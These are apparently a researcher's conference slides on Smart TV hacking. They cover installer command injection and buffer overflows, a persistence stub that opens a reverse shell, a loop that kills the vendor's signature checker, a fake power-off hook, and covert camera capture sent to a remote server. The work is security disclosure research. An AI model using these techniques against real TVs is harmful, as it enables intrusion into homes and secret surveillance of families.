HACKING, SURVEILLING, AND DECEIVING VICTIMS ON SMART TV

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About me

- SeungJin Lee (aka beist)
  - @beist on twitter
- Named to advisory council for Cyber Command in Korea
- Ms-Phd course at Korea University
  - A member of IAS LAB, CIST
  - Professor. SeungJoo Kim
- Interested in offensive security research
  - Hunting security bugs and exploiting
- Finding bugs which requires reverse engineering is my job
  - Working for big companies in Korea
- Wins at hacking contests
- Running hacking contests/conferences in Korea
- Speaking at security conferences
  - SYSCAN, AVTOKYO, CANSECWEST, SECUINSIDE, TROOPERS, HITCON, etc
About this talk

- Research motivation
- What is Smart TV?
- Smart TV Attack surfaces
- Rootkits for Smart TV
  - Persistence shells
  - Working for 24/7
    - Even when users press power button to turn off TV
  - Surveillance program
  - Deceiving users
- Smart TV threat evaluation
  - Smart TV against Smart Phone
- Conclusion
Note about this talk

▪ This is an extended version of one that I gave at CANSECWEST

▪ This talk is more about security bugs and rootkits than about firmware for TV

▪ This talk more covers rootkits than security bugs and exploitations
  ▪ As they’re not different to traditional techniques

▪ This talk is talking about general security issues of all Smart TV vendors
  ▪ But not for a specific vendor :D
Research motivation

- Smart TV is being world popular
  - In 2012, over 80,000,000 Smart TVs Sold
  - People say, it’s going to be more popular
- Lack of security research
  - We hardly see security research on Smart TV yet
- Smart TV is like “home-version smartphone”
- Might be very scary if it’s pwned
  - We’ll see.
- Wanted to measure privacy problem
Smart TV

- **Smart TV is now used in many fields**
  - Home entertainment
  - Office purpose
  - Educational purpose
  - Business purpose

- **Smart TV is not just TV**
  - Changing psychological consumer behavior and its impact on the commercial sector
  - The feasibility of potential applications for smart TV in the consumer electronics market
  - The integration of smart TV platforms with IC technology solutions
Smart TV

- Samsung, LG, Panasonic, Sony and others dive into Smart TV industry
- Smart TV is a regular PC but shows you TV programs
  - Smart TV = TV + PC
  - Also, built-in Camera and voice sensor
  - At the moment, only fancy models have built-in camera and voice sensor
Looks of Smart TV (Front)

Camera

Remote con receiver
Looks of Smart TV (Back)
Smart TV

- More devices inside
  - Bluetooth, wireless device, ++
- Just like a regular PC
  - OS: modern OS like Linux (Or embedded)
  - CPU: ARM
  - Platform:
    - Vendor’s own
- It works like a regular PC
  - Boot-up, load kernel
  - Execute programs, kill programs, ETC
  - Usually shells not provided by vendors
Smart TV feature

- **Camera and MIC**
  - Motion sensor
  - Voice sensor
- **TV can recognize your motion**
  - You move your arm and hand
  - Then select any menu on TV
- **ETC**
- **TV can recognize your voice**
  - To turn on TV: “Hi TV, turn on”
  - To volume down/up: “Volume up/down”
- **ETC**
Big hurdles of Smart TV research

- Lack of documentations and research
- The TV is blackbox
  - No source code
- Smart TV software is huge
  - More than hundreds mega bytes
  - Vendor write most of code
  - Hard to find interesting spots
- Research can brick your TV
  - Sometimes, even the factory reset doesn’t work
  - You have to send it to A/S center – “I did”
- If you do any mistake, the TV will be rebooting
  - Because there is a huge user level binary
  - Hundreds on-off is so tedious
Smart TV attack vectors

- Smart TV has almost same attack vectors as Smart Phone
  - A hacker who uploads malicious apps to your Smart TV app market
  - A hacker outside of your network
  - A hacker in your network
    - Network daemons
    - Man in The Middle
  - A hacker who can be around
    - Who can touch your TV (Physical attacks: USB/etc)
    - Who can see your TV (Remote controller)
    - Who can be around your home (Broadcast signals)
Research start on Smart TV

- **How to start research on mobile phones?**
  - You should do rooting your phone first
    - Both iOS and Android
  - Nothing really much without it
- **How to start research on Smart TV?**
  - You should get a shell first as well!
Research start on Smart TV

- **We started with**
  - Firmware information from Samygo
  - Firmware is encrypted by vendor but Samygo have password information for many firmware
    - Unfortunately, they didn’t have any information for our TV model
    - So, we got an old version and different model firmware, but much better than nothing
  - Extract executable binaries and IDA time!
  - And, UART
Research start on Smart TV

- **Executable binaries**
  - Yay! IDA time!
  - IDA analyzes the ARM code very well

- **UART**
  - Our target has a lot of DEBUG messages which you can see them through UART
    - Booting logs
    - Exception messages
    - Segmentations messages with register values
    - ‘Strings’ are very gold when you feel lost yourself in a huge binary on IDA
Enable UART

- **Our TV UART is disabled by default**
  - You should get into ‘Service Mode’ to make UART enabled

- **How to get into ‘Service Mode’**
  - **TV has 2 Service Modes**
    - **1:** Power off + Mute + 1 + 8 + 2 + Power On
      - This is not for us as it doesn’t have “Advanced Mode”
    - **2:** Info + Factory key combination
      - Our remote controller doesn’t have “Factory key”, so, we should do radio frequency stuff
Enable UART

- We use Arduino to send “Info” and “Factory” Keys to TV
  - We just added this

```cpp
Void loop() {
  ... 
  Data = 0x1f;
  Company_name::SendCommand(Type, Device, Data, Crc);
  delay(1000);
  Data = 0x3b;
  Company_name::SendCommand(Type, Device, Data, Crc);
}
```
Enable UART

[Arduino with Bus Pirate and Advanced mode]
## UART enable commands

<table>
<thead>
<tr>
<th>Set serial port speed: (bps)</th>
</tr>
</thead>
<tbody>
<tr>
<td>1. 300</td>
</tr>
<tr>
<td>2. 1200</td>
</tr>
<tr>
<td>3. 2400</td>
</tr>
<tr>
<td>4. 4800</td>
</tr>
<tr>
<td>5. 9600</td>
</tr>
<tr>
<td>6. 19200</td>
</tr>
<tr>
<td>7. 38400</td>
</tr>
<tr>
<td>8. 57600</td>
</tr>
<tr>
<td>9. 115200</td>
</tr>
<tr>
<td>10. BRG raw value</td>
</tr>
<tr>
<td>(1)&gt;9</td>
</tr>
</tbody>
</table>

Data bits and parity:
- 1. 8, NONE *default
- 2. 8, EVEN
- 3. 8, ODD
- 4. 9, NONE
  (1)>1

<table>
<thead>
<tr>
<th>Stop bits:</th>
</tr>
</thead>
<tbody>
<tr>
<td>1. 1 *default</td>
</tr>
<tr>
<td>2. 2</td>
</tr>
<tr>
<td>(1)&gt;</td>
</tr>
</tbody>
</table>

Receive polarity:
- 1. Idle 1 *default
- 2. Idle 0
  (1)>2

Select output type:
- 1. Open drain (H=Hi-Z, L=GND)
- 2. Normal (H=3.3V, L=GND)
  (1)>2

Ready
UART>(1)

UART bridge Reset to exit
Are you sure? y
So, we’re ready to find bugs

- Again, having binaries and UART is very important as the target is blackbox
  - We’ll tell you later how to see debug messages without UART after having a shell on the box

- From now, our approach is
  1: Reversing binaries
  2: Finding some spots to test
  3: Checking messages from UART
  4: Repeating 1 - 3
Smart TV App Store

- Almost same as mobile app market
  - Developers can make apps for TV
    - SNS clients, NEWS apps, Game, SKYPE, ETC
  - Some vendors don’t allow developers to use native languages like C/C++
    - But ok - HTML/Javascript/Flash
    - It could be because of portability
    - Also because of security policy
  - Vendors try to prevent bad guys from making/uploading malicious apps to application market
Smart TV App Store

[Attack scenario]

1. Upload bad apps
2. Download bad apps

I'm a hacker!
Smart TV App Store

- What is to write in Javascript/Flash for app?
  - It means
  - Can’t call system calls directly
  - Can’t access many resources like files
  - Your code run in VM (Javascript/Flash)
  - Nothing really much you can do

- Attack point
  - Using web browser bugs (including Flash)
    - Traditional attacks can be done (webkit/flash)
  - Using bugs in SDK provided by vendors
    - And the app installer
    - Will talk about this
Smart TV App Store

- Fortunately (To both developers and attackers), vendors provide SDK for development
  - SDK has many features
    - FILE I/O
    - Download and upload via network
    - Screen control API
    - Basic function of TV control API
    - App control API
    - ETC
Smart TV App Store

- Security policy of App
  - Some important APIs do sanity-checks
    - EX) You can’t do “../” when file open()
  - APIs work like they’re in sandbox

```c
- openCommonFile() calls jx_GetFullPath()

jx_GetFullPath(filepath, stricted_directory)
{
  ...
  if not filepath starts with stricted_directory:
    exit
  ...
}
```
Smart TV App Store

- Problem of SDK security policy
  - API level sandbox is not best sandbox
    - Hard to ensure hundreds of APIs do their sandbox job properly
    - Hard to implement all security checks in all APIs
      - Checks in File I/O API might be very robust
      - But what about checks in Audio Control API?
  - All app is running as ‘root’ privilege
    - Which means if there is any single API bug, you’d get a root privilege shell
Smart TV App Store

- **APP bug case #1**
  - The app installer parses a XML file
  - XML file contains
    - App name
    - Title
    - Compression
    - Description
    - Download
    - Etc
  - "Download" field is a URL and a zip of your app
STMFD           SP!, {R4-R8,R11,LR}
LDR             R4, =(_GLOBAL_OFFSET_TABLE_ - 0xCA1840)
LDR             R3, =(aEncodeuri - 0x4E78BC8)
MOV             R5, R2
ADD             R4, PC, R4 ; _GLOBAL_OFFSET_TABLE_
LDR             R2, =(aNaviutilS - 0x4E78BC8)
ADD             R11, SP, #0x18
ADD             R3, R4, R3
SUB             SP, SP, #0x13C
MOV             R6, R1
MOV             R0, #1
ADD             R2, R4, R2
ADD             R3, R3, #0xC
MOV             R1, #4
BL              _ZN7CCDebug5PrintI15CCDebugInfoLinkEEvmmPKcz
LDR             R3, =(g_pTaskManager_ptr - 0x4E78BC8)
MOV             R1, #0x48
LDR             R3, [R4,R3]
LDR             R0, [R3]
BL              _ZN12CTaskManager14GetApplicationE15DTV_APPLICATION
CMP             R6, #0
CMPNE           R5, #0
MOVEQ           R5, 0xFFFFFFFF
MOV             R7, R0
BEQ loc_CA18D0
SUB R8, R11, #-var_148
LDR R1, =(aNiceN19SInfoli - 0x4E78BC8)
LDR R2, =(aMtd_cmmlib - 0x4E78BC8)
MOV R3, R6
ADD R1, R4, R1
MOV R0, R8
ADD R2, R4, R2
STR R5, [SP,#0x154+var_154]
BL _ZN8PCString5PrintEPcPKcz
MOV R1, R8
MOV R0, R7
BL _ZN13CNNaviAppBase9execShellEPKc
LDR R1, =(aSync - 0x4E78BC8)
ADD R1, R4, R1; "sync"
MOV R5, R0
MOV R0, R7
BL _ZN13CNNaviAppBase9execShellEPKc
MOV R0, R5
SUB SP, R11, #0x18
LDMFD SP!, {R4-R8,R11,PC}
Smart TV App Store

- _ZN13CNNaviAppBase9execShellEPKc()
  - It does system()
  - vfork()
  - waitpid()
  - execl()

- Our “Download” value is passed to this with a prefix command
  - EX) “/bin/unzip OUR_DOWNLOAD_VALUE”

- There is a sanity-check for ‘|’, ‘;’ and etc, before our value is passed, but misses some linux special characters like ‘``’ (tilt)
Smart TV App Store

- So, it’s an easy bug
  - `$ some_command myapp. `whoami` zip`

- But there is a hurdle
  - we can’t use `/` character

- Solution:
  - Use `${OLDPWD}`
  - The environment variable has `/` in this case as the installer is a background process
Smart TV App Store

- **APP bug case #2**
  - Another bug in the installer
  - The installer uses “widget_id” value for
    - Making a directory for our app
  - But wrong string handling

```
LDMIA        R9, {R0-R3}
SUB          R5, R5, #4
SUB          R12, R11, #~var_650
STR          R12, [R11,#s]
STMIA        R5, {R0-R3}
SUB          R0, R11, #~var_510
MOV          R2, #0xF0 ; n
MOV          R1, R6  ; c
SUB          R0, R0, #4 ; s
BL           memset
MOV          R0, R5
LDR          R1, [R7,#0x34]
BL           _ZN8PCString7ConcateEPcPKc
```
Smart TV App Store

- \_ZN8PCString7ConcatenateEPcPKc()
  - This wrapper function does
    - `strcat()` inside
  - Simple stack buffer overflow

PC, LR MEMINFO

PC: 61616160, LR: 12834

No VMA for ADDR PC

03e0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0400: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0420: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
Smart TV App Store

- APP bug case #3 and more
  - As we say, there are hundreds of API that developers can use
  - There are many functions that handle string/data wrongly
  - Very kind memory corruption bugs
  - And even system() bugs
    - FILESYSTEM.Unzip()
    - FILESYSTEM.Move()
    - FILESYSTEM.Copy()
    - FILESYSTEM.Delete()
      - Delete() actually doesn’t work as it checks first if the given path exists before system(delete_file)
Smart TV App Store

- FILESYSTEM.Unzip() bug

```assembly
LDR    R1, =(aUnzip - 0x1FAB08)
MOV    R0, R4
ADD    R1, R5, R1 ; "Unzip"
BL     _ZNKSs7compareEPKc
CMP    R0, #0
BEQ    loc_9D4E0

LDR    R0, [R11,#arg_0]
LDR    R1, [R6]
LDR    R2, [R0]
LDR    R0, [R7,#0x28]
BL     j__ZN3sef18CEmpTaskFileSystem5UnzipEPcS1_
```

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Smart TV App Store

- FILESYSTEM.Unzip() bug

```
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Registers</th>
</tr>
</thead>
<tbody>
<tr>
<td>SUB</td>
<td>R1, R11, #-var_430</td>
</tr>
<tr>
<td>LDR</td>
<td>R0, [R11,#var_440]</td>
</tr>
<tr>
<td>SUB</td>
<td>R1, R1, #0xC</td>
</tr>
<tr>
<td>BL</td>
<td>j__ZN3sef18CEmpTask FileSystem10SystemCallEPKc</td>
</tr>
<tr>
<td>MOV</td>
<td>R0, R6</td>
</tr>
<tr>
<td>BL</td>
<td>_ZN3sef12SefExecShell1EPKc</td>
</tr>
</tbody>
</table>
```

- Game over
There are more security bugs in API but won’t list them up all

Over again, this is not only API’s problem.

This is because all app is running as ‘root’ privilege

Also, TV strongly relies on secure (but maybe insecure) coding but not security protection like sandbox
A hacker outside of your network

1. Set up a bad web site
2. Connect to the web site
3. Bad payload sent to the Smart TV

INFECTED!
A hacker outside of your network

- SNS client is a gold vector for Smart TV hackers
  - Smart TV is more fancy than you think
  - Vendors are really building a new software platform
  - You have Smart TV edition facebook called “Our story” (Faked name)
    - They have a facebook app inside, anyway
  - You make friends and send photos, messages and etc
  - Of course this is a good attack point
A hacker outside of your network

- **Traditional vectors are also possible**
  - Web browser
  - It’s hard to patch security flaws for embedded systems
- The browser uses webkit and flash
  - They’re old versions and it’s not just an old webkit or flash problem.
  - There are a bunch of old libraries
A hacker outside of your network

- Traditional vectors are also possible
  - Web surfing within the Smart TV web browser is like web surfing within a web browser from many years ago
- Huge risk

This box dynamically displays the following information:

Your Flash Player Version: 10.1.105.7
Your OS: Linux 2.6.35.13 (32-bit)
Your Browser: Safari
A hacker in your network

- **Network daemons**
  - There are around 10 tcp/udp daemons
  - They are not ftp/sendmail/ssh
  - But for providing rich experiences to user

<table>
<thead>
<tr>
<th>Protocol</th>
<th>Local Address</th>
<th>Remote Address</th>
<th>State</th>
<th>User</th>
</tr>
</thead>
<tbody>
<tr>
<td>tcp</td>
<td>0.0.0.0:58336</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:64384</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:57794</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:9090</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:50887</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:51916</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:80</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:6000</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>471/X</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:55000</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:55001</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:62778</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>847/MainServer</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:4443</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>0.0.0.0:443</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
<tr>
<td>tcp</td>
<td>10.0.1.23:7676</td>
<td>0.0.0.0:*</td>
<td>LISTEN</td>
<td>67/exeDSP</td>
</tr>
</tbody>
</table>
A hacker in your network

- The 55000 looks interesting
  - It has interesting functions
  - `CTVControlManager::PacketParsing()` parses our packet
- Around 20 commands in `switch()`
  - 0, 1, 2, 4, 6, 7, 8, 9, 11, 12, 17, 18, 19, 20, 20, 100 (auth and provide rich features to client), 110 (bluetooth pairing), 120 (Get public key), 121 (rsa decrypt), 130 (send key after aes decrypt), 200
- Only a few commands need authentication
A hacker in your network

- There are some spots of memory corruption in commands that do some crypto
  - They don’t properly check user value
  - It’s exploitable but references uncontrollable data by us
  - We seldom see PC points to unmapped address, but have not done with a way make it reliable yet (lame)

```
Pid: 3465, comm: RemoteClient CPU: 0
Tainted: P       (2.6.35.13 #1)
pc : [<01bb36d4>] lr : [<036ca950>] psr: a0000010sp : 8f339bc0
ip : 8f33ccd4 fp : 8f339bfc r10: 8f33ac60 r9 : 8f33cce4 r8 : 00000000
r7 : 8f33ac60 r6 : 8f340450 r5 : 066e91e8 r4 : 0788eb98 r3 : 00000000
r2 : 06d97380 r1 : 00000000 r0 : 00000000
```
A hacker in your network

- Port 7676 is UPNP service looks interesting
  - It has around 6 services
    - 2 services need you authenticated
    - 4 services don’t need you authentication
  - But didn’t find any bug yet

- Man in The Middle
  - We said, all apps are running as ‘root’
  - If there is anything wrong handling during MiTM, it’s pwned
    - For example, while update apps
    - We found some at updating code
  - And there are packets not encrypted even for credentials
A hacker who can be around

- Who can touch your TV
  - Physical attacks
  - USB, other ports, etc
    - The TV is Linux version 2.6.35
- Who can see your TV
  - Remote controller
  - Tried to find memory corruption bugs in the code that parses your remote signals
    - #fail
- Who can be around your home
  - Broadcast signals
  - But unfortunately, we’ve not done anything with this yet
What do you do in pwned TV?

- Basically, you can do everything
  - As it’s just a regular PC
- Bad guys would do
  - Hijacking TV programs
  - Key-logging
  - Capturing TV screenshot
  - Sniffing network traffic
  - Stealing financial information
Persistent shells from TV

- We need shells from rebooted TV
- There are 3 general ways for that
  - 1: Re-writing firmware
    - Like Smart TV updates itself
    - But this could make TV a brick
  - 2: Remounting to make partitions writable and writing something bad into files
    - Example) /etc/init.rc
    - But “mount -o rw” sometimes doesn’t work in embedded platforms for some reason
  - 3: Finding some .so files loaded by programs in a writable partition
    - We take this way
Persistent shells from TV

- Finding some so files loaded by programs in a writable partition
  - This can be achieved easily
  - Hooking `sys_open()` and checking if there is any “No such file or directory” error return number within .so file extension
    - We found some files
    - The files are loaded by web browser launcher
    - And the launcher is executed when booting

```c
void _init() {
    system(do_some_bad);
    reverse_shell(my_ip);
}
```
Persistent shells from TV

- But there is a User Executable Preventer service daemon by the vendor
- It checks files and removes if they’re not signed by the vendor

```c
void sign_check() {
    while(1) {
        file = find_next_file();
        if(!is_Executable(file)) continue;
        ret = CheckRSA(file);
        if(ret == NOT_SIGNED) {
            remove(file);
        }
    }
    sleep(some);
}
```
Persistent shells from TV

- **Problem of the PREVENTER**
  - As it has to scan all directories and files, it will not delete your file immediately.
  - Which means, you usually have time to do something before the PREVENTER.
  - It would be better if they implemented it at system call level hooking like in `sys_execve` or `sys_open`.
    - But still a lot of ways to bypass it, anyway.
Persistent shells from TV

- Solution for attackers: Just kill the daemon
- Now not signed programs can be also alive
- Note: The PREVENTER is not a good idea. It doesn’t actually prevent, but, just gives bad performance to TV

[OUR ‘PREVENTER’ KILLER]

```c
main() {
    while(1) {
        while(1) {
            system("killall -9 PREVENTER");
            sleep(5);
        }
    }
}
```
What does beist do in pwned TV?

- We asked around 100 friends what case is the worst if their Smart TV got hacked
  - 1: Stealing financial information
  - 2: Hijacking TV programs
  - 3: Breaking your TV
  - 4: Watching and listening via your TV
- Vote, please?
What does beist do in pwned TV?

- **SURVEY RESULT**
- We asked friends around 100 what’s the worst case people think if their Smart TV got hacked
  - 1: Stealing financial information
    - 10%
  - 2: Hijacking TV programs
    - 0%
  - 3: Breaking your TV
    - 5%
  - 4: Watching and listening via your TV
    - 85%
What does 85% mean?

- 85% is still very high
- But I think the 15% didn’t exactly understand what I can do in pwned TV
  - Most of them are not computer experts
Privacy!

- We know that Smart TV have built-in camera and mic
  - Sounds so fun
- But before we cover “Surveillance implementation part” of pwned Smart TV, I need to mention
  - Surveillance program
    - Smart phone against Smart TV
    - As a view of bad guys
Surveillance on Smartphone

- Smartphone
  - Smartphone has camera and MIC
  - But have you ever captured photos using the camera 24/7?
    - “I did the test”
  - I ran a simple surveillance program in an android Smartphone
    - It took a photo every 1 minuet
    - I went out with it and used like my real phone
  - I got 2 problems while the test
Surveillance on Smartphone

- Smartphone
  - Problem 1
  - After having hundreds of photos, I checked those pictures
  - Only around 1% photos were “just ok”
  - More than 99% photos were useless
  - You can easily guess why
    - You usually put your phone in your pocket or on the desk
    - Or moving so fast, then it’s so blur
Surveillance on Smartphone

- Smartphone
  - Problem 2
  - I don’t take photos much using my phone
  - But after this test, I realized taking pictures drains power
  - If you run your surveillance program in a target’s phone, he’ll recognize it quickly as his phone will be dying before lunch
Surveillance on Smart TV

- **Smart TV**
  - There is no power problem
    - TV is almost always connected to the power
    - Even no problem with 24 hour recording
  - TV can’t move
    - But on the other hand, it’s a good *photographer*
  - Surveillance on TV is not only about you
    - However, it’s also about your family or people who you very love
    - Do not make TV see your bed
Surveillance on Smart TV

- **Smart TV**
  - TV can’t go to your office
  - It may not steal your business information or secret conversation
    - Unless if you put Smart TV at office
    - But we hear Smart TV is getting used more and more in corporate environments
  - But things that bad guys can get from pwned Smart TV would be very personal privacies
  - And it’s so terrible, obviously
We need debugging

- Debugging is necessary as most of code are written in C++
- There are many binaries but a binary is very huge over 100mb and it is the core program
  - Even ported GDB was not convenient
  - Many hangs which we didn’t figure yet
- Wanted to have a more comfortable tool to use
- @collinrm Collin Mulliner’s android DBI
  - [http://www.mulliner.org/android/](http://www.mulliner.org/android/)
  - [http://www.mulliner.org/android/feed/collin_android_dbi_v02.zip](http://www.mulliner.org/android/feed/collin_android_dbi_v02.zip)
Collin’s DBI for Android

- **How Collin’s DBI for Android works**
  - It `ptrace()` a target process and changes PC, then executes a shellcode that does `dlopen()`
    - The `dlopen()` shellcode is in stack
    - Call `mprotect()` to make it executable
  - The shellcode patches our target function
  - `hijack.c`: inject `libt.so` into the target process using `ptrace()`
    - `libt.c`: inline hooking in the target function
  - It works great after modifying a bit for TV
Sample hooking code

```c
// TCTv::Power(int, TCTv::EBootReason, bool)
#define ADDR 0x00E5CBC4

void _init() {
    printf("libt.so loaded...\n");
    fflush(stdout);
    // TCTv::Power(int, TCTv::EBootReason, bool)
    addr = (void*)((int)ADDR) & ~(4096-1));
    mprotect((char *)addr, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
    hook(&hook_info, ADDR, hooked_func);
}

void (*orig_my_func) (int a, int b, int c);

void hooked_func(int a, int b, int c) {
    printf("hooked!\n");
    fflush(stdout);
    orig_my_func = (void*) hook_info.orig;
    hook_precall(&hook_info);
    orig_my_func(a, b, c);
    hook_postcall(&hook_info);
}
```
Debugging to trace C++ stacks

- C++ is hard to know who is calling and who is called, we mainly used DBI to trace it easily. Argument value is bonus.

```c
asm ("mov %0, %r0\n" :"=r"(r0));
asm ("mov %0, %r1\n" :"=r"(r1));
asm ("mov %0, %r2\n" :"=r"(r2));
asm ("mov %0, %r3\n" :"=r"(r3));
asm ("mov %0, %lr\n" :"=r"(lr));
asm ("mov %0, %pc\n" :"=r"(pc));
printf("=== Dump Registers ===\n");
printf("r0 = %p\n", r0);
printf("r1 = %p\n", r1);
printf("r2 = %p\n", r2);
printf("r3 = %p\n", r3);
printf("lr = %p\n", lr);
printf("pc = %p\n", pc);
p = (int *)r0;
printf("this pointer : %p\n", p);
vftable = (int *)p;
printf("vftable : %x\n", vftable);
```
Guide by the dev: Debug messages in binaries

- The developers leave a lot of debug messages that can be very useful for us
  - --- SCAN CODE=[%d] vs Converted CODE=[%d]
  - TYPE=[%ld], CODE=[%d]
  - ***** kbd=[0x%lx] VS m_keyboard=[0x%lx] *****

- Unfortunately, global variables made for release version don’t help us

```c
... if (global_690E4C8 <= some_value) {
    if (some_value <= global_690E4D0) {
        printf("SOME_VERY_USEFUL_DEBUG_MSG");
    }
} ...
```
To get hints from developers

- But, we can change the global values by runtime patch and see those useful messages

```c
ptrace(PTRACE_ATTACH, pid, 0, 0);
ptrace(PTRACE_POKEDATA, pid, 0x690E4C8, 0x00000000); // DEBUG_LOW_ADDRESS
ptrace(PTRACE_POKEDATA, pid, 0x690E4D0, 0x00003030); // DEBUG_HIGH_ADDRESS
ptrace(PTRACE_DETACH, pid, 0, 0);
```

- Then, it’s going to be more easier
Does your rootkit work 24/7?

- My father always tells me
  - Father: “Turn off TV before you go out.”
  - Me: “But, my rootkit is running inside!”
- As Smart TV is like a regular PC, when users turn off TV, every program is down
- It’s time to show a clever trick
- If we can
  - #1984 and 24-hour surveillance
Korean hackers work for 24/7

- Our surveillance program should work for 24/7 even when users turn-off TV

- For the record:
  - We didn’t really want to make this, but, the company said to media (ZDNET Korea)
  - “By bad guys, taking pictures might be possible in TV, but, when users turn off TV, it’s impossible.”

- But Smart TV is just like a regular PC, we should be able to do everything if we already pwned it.
How? Reversing and hacking

- First, we should find functions that do turn-on and turn-off
  - TCTv::Power()
- When TV is on and user press “power button”, TV does
  - Off screen
  - Off sound
  - Off some processes
    - Not kernel
  - And reach to TCTv::Power() to actually turn off
Trick for 24/7

- So, we put a tiny hook code in prologue of TCTv::Power()
  - Just “return”
- Then, it seems TV is off except this LED
Trick for 24/7

- To turn off the LED, we call
  - `TDsSystem::SetLightEffect()` with 0
- Now, the TV looks turn-off!
  - But actually not
  - Our rookit is still working
- We have to put another hook code at
  `TCTv::Power()` again
  - `if(second_condition)`
    - `TDsSystem::SetLightEffect()` with 3
Trick for 24/7

- Later, user push “power button” again to turn on the TV
- It will reach to TCTv::Power() and TDsSystem::SetLightEffect(3) will be called
  - To make the LED on
- Then, we call TDsSystem::SetPower(0)
  - For “fast-reboot”, this takes only 1 sec
  - And TV screen, sound, processes go up
- Since the fast-reboot, it’s rebooted and our shell is disconnected
  - But we have persistence shells!
  - After a few minuets later, we’ll get a shell
Trick for 24/7

- By this way, users never realize if there is something inside!
  - Rootkit!
- So, we’ve done so far
  - Getting shells from the box
  - Cute tricks for debug messages
    - Patch and linux kernel module
  - Some debugging
  - Persistence shells
  - 24/7 working
- And.. Where is the surveillance?!
The self surveillance program

- We’ve implemented two surveillance tools
  - 1: Taking pictures and sending them to our server automatically
  - 2: Video recording and live-watch it remotely (Streaming!)

- We’ll cover both how we implemented the 2 tools
- But will only give a demo for the second one as it’s much more funnier than first one and due to time lack
A photo taker

- We have to understand how the TV works
  - How?
  - A lot of reversing

- We could use the camera device driver directly, but, tried to know what user level functions are actually used for it
Ideas to implement a photographer

1. Learn API related camera provided by the vendor and use it our app
   - Problem: possibility it only works in a normal app and can not be background

2. Reversing the default camera program in the TV
   - Problem: it takes more time than just learning those APIs
   - But we take this because this might be an ultimate solution
Ideas to implement a photographer

- **How the default camera program works**
  - 1. Open `/tmp/stream_socket`
  - 2. Send commands to the socket
  - [Commands]
    - Send “Camera”
    - Send “StopSecCamStreaming”
    - Send “SetMicVolume”
    - And so on..
    - Send “SetCameraDisplaySize”
    - Send “SetCameraProperty”
    - Send “CaptureCamVideo”
    - Send “StopCamVideo”
    - And reply them for loop
Protocol for the commands

- It has a fairly simple protocol format
  - \([\text{Length\_of\_command}] - [\text{Command}] - [\text{Length\_of\_ARG1}] - [\text{ARG1\_value}] - [\text{Length\_of\_ARG2}] - [\text{ARG2\_value}] - [\text{Length\_of\_ARG3}] - [\text{ARG3\_value}] - [\text{Length\_of\_ARG4}] - [\text{ARG4\_value}]\) and so on

- A dump for SetCamVideoDisplaySize command
  - 0x18 0x00 0x00 0x00 0x00 0x53(S) 0x65(e) 0x74(t) 0x43(C) 0x61(a) 0x6d(m) 0x56(V) 0x69(i) 0x64(d) 0x65(e) 0x6f(o) 0x44(D) 0x69(i) 0x73(s) 0x70(p) 0x6c(l) 0x61(a) 0x79(y) 0x53(S) 0x69(i) 0x7a(z) 0x65(e) 0x00 0x00 0x04 0x00 0x00 0x00 0x00 0x30(0) 0x00 0x00 0x04 0x00 0x00 0x00 0x00 0x00 0x08 0x00 0x00 0x00 0x00 0x31(1) 0x39(9) 0x32(2) 0x30(0) 0x00 0x00 0x00 0x00 0x08 0x00 0x00 0x00 0x00 0x31(1) 0x30(0) 0x00 0x00 0x00 0x00 0x38(8) 0x30(0) 0x00 0x00 0x00 0x00
A video taker

- Now, you can take pictures by the communication with the socket
  - And within the commands
- It’s time to implement a video taker
- There was a problem that the camera app didn’t make a dump file for the stream
- So, we had to find a way to dump it
- By reversing, we’ve analyzed we can be reached there via..
#TODO – Video recording

...  
```
CMoIPStreamManager::StartMediator() ->
CMoIPStreamManager::SetMicVolume() ->
CMoIPCameraManager::SetProperty() ->
CMoIPEmpMediator::ProcessCmd() =>
CMoIPCameraManager::GetCapability() =>
CMoIPStreamManager::SetCamVideoSize(0,0,1920,1080) ->
CMoIPStreamManager::SetCameraProp(3,1280,720) ->
CMoIPStreamManager::SetCamSrcSize(1280,720) ->
CMoIPVideoFeeder::SetScrVideoSize(1280,720) ->
CMoIPStreamManager::StartCamVideo(1,2) ->
CMoIPStreamManager::InitializeCamVideo() ->
CMoIPVideoFeeder::SetSourceType() ->
CMoIPVideoFeeder::StartRenderer() ->
CMoIPVideoFeeder::Initialize() ->
CMoIPVideoFeeder::InitVideo() ->
CMoIPVideoFeeder::t_InitVideoDecoder() ->
CMoIPStreamThread::Create() ->
CMoIPStreamManager::StartCamRecord() ->
CMoIPReceiveCamVideo::SubmitVideoData() ->
CMoIPBuffer::Read() ->
CMoIPVideoFeeder::SubmitVideoData()
...```
ReadBuffer sounds always good

